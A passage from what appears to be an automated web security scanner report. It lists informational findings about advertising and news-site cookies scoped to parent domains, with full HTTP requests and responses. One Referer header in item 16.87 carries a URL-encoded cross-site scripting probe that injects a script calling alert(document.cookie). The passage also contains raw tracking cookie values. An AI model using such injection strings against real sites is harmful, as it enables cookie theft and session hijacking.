<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://
...[SNIP]...

16.85. http://helenaspopkin.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://helenaspopkin.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=4166254bf39fbdb2b2c04df95de6c650; expires=Sat, 25-Jan-2031 02:07:18 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: helenaspopkin.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:07:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=4166254bf39fbdb2b2c04df95de6c650; expires=Sat, 25-Jan-2031 02:07:18 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close

16.86. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 02:08:24 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG6Q/DYS3+0s]#%2L_'x%SEV/i#+93=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiI0aU8E.A1>N#b#Qdqc@TwKrL$L2pv>3u[KE^pd=S(K$r@Fp>9H; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 31-Jan-2011 02:08:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 02:08:24 GMT; domain=.adnxs.com; HttpOnly
Location: ..*.
Date: Sun, 30 Jan 2011 02:08:24 GMT
Content-Length: 0
Connection: close

16.87. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG6Q/DYS3+0s]#%2L_'x%SEV/i#+93=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiI0aU8E.A1>N#b#QOC'2OMcvd#bcb!]*j^2`kdi6<Po<z!?1VRH; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?member=104&add_code=86011 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#_iB?.d1/(e7aL+.AJ_WH9u4SPD=p^m

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 31-Jan-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG6Q/DYS3+0s]#%2L_'x%SEV/i#+93=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiI0aU8E.A1>N#b#QOC'2OMcvd#bcb!]*j^2`kdi6<Po<z!?1VRH; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly
Location: http://aidps.redcated/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/4760492999213801733/gif?meta=appNexus
Date: Sun, 30 Jan 2011 01:23:55 GMT
Content-Length: 0

16.88. http://ingame.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ingame.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=2f27a7911e836626553146fb369daabe; expires=Sat, 25-Jan-2031 02:07:24 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ingame.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:07:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=2f27a7911e836626553146fb369daabe; expires=Sat, 25-Jan-2031 02:07:24 GMT; path=/; domain=.newsvine.com
Location: http://ingame.msnbc.msn.com/
Content-Length: 2
Content-Type: text/html
Connection: close

16.89. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLv39SEJaSpn5l6paNmEWEzMqFRxKmlqLQZYxUOmG8ggolbMMvPsEEvJzkvhsvqTqAgDHJSkCRJECssiC+uNc0HvGBEwWMU1I/WZp2twauhl2HLuWCqVcMdoFzqPRdkboPy/4hudEhz+lsYyXiLltBm23RQ5kkhyU1jd7+S5iLCbslvM7XhfdRXs/LcG1fY/mxKKCC0YXfoQZJn9VDb2LOYFtxYmAZ6ztXcixPWz2RHsR7YVvcyJy858LTleiKLWa6VJtWUnlW1R5cEOxOVzVEPDU5JDm5FBb/PdzodlGGdSLImCnc30q3bosBAe1rCEoDlx9lkC0Z86u/7DXZA8OxpdIIZq3fm2x/Y1L/Fk6ubpQHq4yX+o7EgD8uvlSgO0rKW6DQpHvr05vHctOQCNhqTN9KtSovoK3V2XolIf+t+j8Fgr3oGrPvVMMOE+TtGi0T9GoqUGUdysI1D4HKgX2AeugvReG9yoU1WsCd96QJueeSZ9JW/hOoDAWQkWkL8cOSyJzSWMwamURPqLx+BisksqWdC/eBRvw9pXjNGRC6A2mTvF4qXnGgQTM3xjSifI+qX3GIcEGehR/kx+tOqDogRTs9TB3AAxoEuG0odnEy+DqPk52zTRte34chLZbeljSNuNAYgQnoBq4CvXsYfxEduAIt752bikdcyuIhj3DpogvW1pIzCZj7OIswr7Kn7ocfRjdAoL5T2uac/PT2Ydxc3xjy0HLBJPLbaN5HHHjdZ/T93Y0699FKXSmLQGIKZG/2yo8JITGL6MRcrdgyiTv35BCJuq368OVvIprsvvBAzlr2f4A8D5vhA7ZWI3sz30r2/s6dMS4r6GrFsgTbGEW11NGX8Jde7gdHMZiA7tQ9gNCNGwqql7QhJhTPnfqdBL+a2OE4iEDwzU5HcmCK3Y398/UWNtb+6WFgOQug8K08j5l7wrXjl372x2NFfJHBb4XQY7FFmKtDqZxGIB2GKfviK0+/3YJMKFhYlyBNuG+/5lbR1s04q8+Vl/Snxxyvwgdyv/F6uu8Sx/ED5jwkHGxKhrSD7I+9k9V2kKInbD9r9ClYHVTZvO/d9h1bs3b+wi7zbYw7cytf6R7E4UYzc9gAwi7K93pOLo9Dhkqxh8fi6awKRNuxkffO86mJh7RL+xQWFDJ8oDSPJa7pHSjDWcxrpbo+K5ZLrxrnxb78GjhpHYUxyZgCjjTpyHGwkX4vxoS3HpwxFkdG6F6w==; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:29:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=A06546 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; udm_0=MLv39VMJbipn554F09GgNxMpkOwhQkB+ReMynNmKbjrhoBNeBtv5glFga/EX00ge7s9SE/kLHg0oVCPoIUwn1u/1quN4wFLkemB+Xfkh9sVvaV9d1yFwVk1MqQQXIESd+rMOsJq/lEzttO20QWpsbjS5fd2sBKwIWtd/mfri7f0iscF0KJp4BDYI/KwV2hfJzpDxxCsBHcBPVMRoqZgnORQjaPsdQGhZw7tulNqoiwJSvbEKZ4b/qo/4Cpz6QixGs3JFcz/d47RI0f52a8VOS/oanKbybuVRwAchWXhFZ49mH79cJcwjgNFziR+AwH35dr4QzoinlMcvdLgHgXDxmSnMsPB5jNFYycfQEQ6WS1ThuvKZxCd7clanJafNMYS5TsOkkRggNjtpwI087PpWPpMGetCS0D1wi9rmgfAMFRd5aDbdKVB2JU+QCgclcDlyuDtZxlosVpDeByLznalOYezhNJsbXFXdXtxNy+mVjXktVgVuO02ZHyOWogEfqWo4Q5+aY1F1AjDLg+Zsegz1mBoDNg4gKj1iT49F4U6JIWjV6bGKomPcb7JGMdfzI0l6BUC35co0AKqs8XsAaIDjj5KVsEEGcSdy9WPDLpzxKicxaVYQocxdaN1mvETNiIM0B0KR0f/D5UmpY+VE1ujREads9zEg6182eq7dR0yVPf2Eqs51v/W/GJSX9U3iDyBHhnrx/9HEhRWq7W15xibc2cnuu+qsy59jOE8/kIy4uagvHOUgRn1vEHdTdFRa22FY6bvlmBiPj5uQlbuYirr/PKeXnTQB/vBeFzGCuuo8S794L0B/o1evuwc3fo7HSrCjZY1OUgnZAsbW9vw8WwL3pDFQEKF9GRw8Jr22FN0q5V5BkTn/vt53Lzox5LPdmUrFCT39va7aVYr9iKzg2DqSfKXOR0G6ztaUqNT2b2dpza0lJm83EhilrO8VMxhWjvKbTssXQxZMSUfIfFD8NggPglVDfE4zxlxdNxQERkcerOzsyPSAcOqxxaha1UpxTYC5JBvlrGZmQVBfjVRJ5mu8/F3MBD+4ebFA7f6NDCpP6R6kenBb79De4ZpLw1N41KiOWS7TiPdLlFhYtJa+jYWXsKx9qlYbnwXDuLSyZnM5Iw0uwz2qU9+zhxlBQq0Sl/JMT2xPGqgISytMqnZvQvLIGnH8Gfu6; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; rsi_us_1000000=pUMdIzlHMAYY1E2E9lxOYWXfXTuzYLjp8p1460/+gWTby/AVlHUSZTOeZKFoZQt/V4GpHKodzzO99xyuL+LlNTOgYNk8l7vd9SWxAAvTUjn9wS/Zubj3pseYHAeyBVwS0rUlJRFhp0SxvIn+bW5/BIpp2vBxnS14MViPq2ivke+iDP09PJL7xbJKM3DlRa3LSrtKzc89EsvYTbzu+kGpcc6NxWHBkG8ge2CQugoNifcYvbm/lCUs3YPUzchjpm/nOoJHm/cTLVlzOq2/hXTPb0MyCGujLE+IIF9R1j0tsya4cpTKxDHVHAwYM3CYkYHc7waufhO+YEECVhuwsWC98+TEYKnbvBuZ/LFUC5M+ne413gSJ9fKGNrpOsMVsO4uPvBojOqcVHxnpGBRWnjTCP1cUtV83GYLcdAOzcPrvpMNcC9WG3rFQnzSleYPtOb7kiE3oL1h8KEDcjRCOt4LdC7+bpu9UJrc/0m2ZFKslWZ6fphmOl6qQMtHee9NA2R5+ZaqoZDJiJcH6Cj34rgnO5dCjuZjPEAN3vyk/cs5oNuOTnGtZPmRUwjY4fVfWopHNfW2Hu+t6WTXXmXTsLLsiGCT83eSgcWmlkf8aqGRfLHUzj26RTTM1dA7FHmNLza1hwTpKTQyJZDnk7HhRdai6Qcedk92mB2yV7SyHaep1kc0pnTX1Qc/HzKFDmbdh3+t60ZExD/vR2iAE6pKe1RW2/VKzWWtrj/+vWMTJqMy6KoBls3cVklTZxj0UxrdA3I4yJL2OKgNmAH1FPWgdbdyfuXjzsNfYHjat3uSgUtGUpaBySrTnDVNyX5YanrliGmSmPduj8LhA4KqX2YlmOVFoyDQFpOGcgnSlNcNJ00sfOyYI0EutT6h+jdgkz1QsYDywfKPuWNTZ4xzyhLKndjXyrV+OabUYyXa0zgarUEmj9DZ9ISVT0Ib00Gn+eML8NG2PTlecukGp/CVFvlwLbepBNmq97MFUk0PW3PIS0CJypACtU6kUoxQY2OEYFTYNFJ2uxPeVH2/UEpOEGzASxS069mjpvdCw4bmy1/VIOcn2qE1N5k5tc1MqXjUzdty7zYp2QIKE1MArjDBEYVBC8iDElqY95xHnn/xH0nyKgpVKBBbhJ3uQr4Ko1Livxx0MjJEm3cCuBSwGwiodkkzT5/8QeB3PZQmb6DOXNitLk9xP2Eu8MhqIgnIvQ0UunQUiUnIYGB43AQ9mjtJ2tqaDgCaX2jI1u6Xyp5hG15mbLHdX1UVqq04ZRL18CIJr

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39SEJaSpn5l6paNmEWEzMqFRxKmlqLQZYxUOmG8ggolbMMvPsEEvJzkvhsvqTqAgDHJSkCRJECssiC+uNc0HvGBEwWMU1I/WZp2twauhl2HLuWCqVcMdoFzqPRdkboPy/4hudEhz+lsYyXiLltBm23RQ5kkhyU1jd7+S5iLCbslvM7XhfdRXs/LcG1fY/mxKKCC0YXfoQZJn9VDb2LOYFtxYmAZ6ztXcixPWz2RHsR7YVvcyJy858LTleiKLWa6VJtWUnlW1R5cEOxOVzVEPDU5JDm5FBb/PdzodlGGdSLImCnc30q3bosBAe1rCEoDlx9lkC0Z86u/7DXZA8OxpdIIZq3fm2x/Y1L/Fk6ubpQHq4yX+o7EgD8uvlSgO0rKW6DQpHvr05vHctOQCNhqTN9KtSovoK3V2XolIf+t+j8Fgr3oGrPvVMMOE+TtGi0T9GoqUGUdysI1D4HKgX2AeugvReG9yoU1WsCd96QJueeSZ9JW/hOoDAWQkWkL8cOSyJzSWMwamURPqLx+BisksqWdC/eBRvw9pXjNGRC6A2mTvF4qXnGgQTM3xjSifI+qX3GIcEGehR/kx+tOqDogRTs9TB3AAxoEuG0odnEy+DqPk52zTRte34chLZbeljSNuNAYgQnoBq4CvXsYfxEduAIt752bikdcyuIhj3DpogvW1pIzCZj7OIswr7Kn7ocfRjdAoL5T2uac/PT2Ydxc3xjy0HLBJPLbaN5HHHjdZ/T93Y0699FKXSmLQGIKZG/2yo8JITGL6MRcrdgyiTv35BCJuq368OVvIprsvvBAzlr2f4A8D5vhA7ZWI3sz30r2/s6dMS4r6GrFsgTbGEW11NGX8Jde7gdHMZiA7tQ9gNCNGwqql7QhJhTPnfqdBL+a2OE4iEDwzU5HcmCK3Y398/UWNtb+6WFgOQug8K08j5l7wrXjl372x2NFfJHBb4XQY7FFmKtDqZxGIB2GKfviK0+/3YJMKFhYlyBNuG+/5lbR1s04q8+Vl/Snxxyvwgdyv/F6uu8Sx/ED5jwkHGxKhrSD7I+9k9V2kKInbD9r9ClYHVTZvO/d9h1bs3b+wi7zbYw7cytf6R7E4UYzc9gAwi7K93pOLo9Dhkqxh8fi6awKRNuxkffO86mJh7RL+xQWFDJ8oDSPJa7pHSjDWcxrpbo+K5ZLrxrnxb78GjhpHYUxyZgCjjTpyHGwkX4vxoS3HpwxFkdG6F6w==; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:29:41 GMT; Path=/
Last-Modified: Sun, 30 Jan 2011 01:29:41 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 31 Jan 2011 01:29:41 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sun, 30 Jan 2011 01:29:41 GMT
Content-Length: 5639

//Vermont-12.4.0-1012
var rsi_now= new Date();
var rsi_csid= 'A06546';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...

16.90. http://latino.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://latino.redacted
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=3b8b0f18a4fc473bb2a2901d1486ffca; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: latino.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA48
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3b8b0f18a4fc473bb2a2901d1486ffca; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Set-Cookie: mh=MSFT; domain=.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Set-Cookie: CC=US; domain=.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Set-Cookie: hpsvr=D:blu|W:F|P:W; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: hpcli=0|W.1.1; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: hpwea=wc:USNY0996; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: FlightGroupId=74; domain=latino.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Set-Cookie: FlightId=BasePage; domain=latino.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 72919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="es-us" lang="es-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.91. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=k4ZRNJpwIg02F1BCdbdRdgwUwXUHI8Y4F1BCYTeRdgQ3gZUHIQTnG1BCF2pRdgAohXUHIYZ4F1BCKGeRdgwohXUHIca4F1BCiGeRdgQshXUHwOIAM/oB0L7YCwAoGuxr1RQcKaYAGK2AI9YB7M53EkL3FJwgPXw6TVkJsuWB/0mxzfa7GIaWGDdrMaw41Zg3kq1B6bjxdp6bDwWZGu3r4fQsMaM+wa3BW8ox43I9HsfzFp/sNiQQoaUHs2DC1xmBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/
GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=merchant_cs=1&betq=11325=420981 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.merchantcircle.com/corporate/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:21:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=k4ZRNJpwIg02F1BCdbdRdgwUwXUHI8Y4F1BCYTeRdgQ3gZUHIQTnG1BCF2pRdgAohXUHIYZ4F1BCKGeRdgwohXUHIca4F1BCiGeRdgQshXUHwOIAM/oB0L7YCwAoGuxr1RQcKaYAGK2AI9YB7M53EkL3FJwgPXw6TVkJsuWB/0mxzfa7GIaWGDdrMaw41Zg3kq1B6bjxdp6bDwWZGu3r4fQsMaM+wa3BW8ox43I9HsfzFp/sNiQQoaUHs2DC1xmBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/
Set-Cookie: GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 30 Jan 2011 18:21:40 GMT
Content-Type: image/gif
Content-Length: 49

